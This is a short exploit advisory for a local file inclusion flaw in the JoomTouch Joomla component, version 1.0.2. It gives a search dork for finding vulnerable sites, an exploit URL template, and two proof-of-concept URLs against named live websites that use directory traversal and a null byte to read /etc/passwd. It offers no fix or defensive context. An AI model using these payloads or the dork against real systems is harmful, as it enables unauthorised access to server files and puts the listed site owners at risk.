JoomTouch Joomla Component <= LFI Vuln

[o] JoomTouch Joomla Component <= Local File Inclusion Vulnerability



Software : com_joomtouch ver 1.0.2

Vendor : http://www.joomtouch.com/

Dork : "com_joomtouch"

Author : NoGe





[o] Exploit



http://localhost/[path]/index.php?option=com_joomtouch&controller=[LFI]





[o] PoC



http://torah5.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00

http://www.shivamtranscon.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00







DIRGAHAYU INDONESIAKU... MERDEKA!!!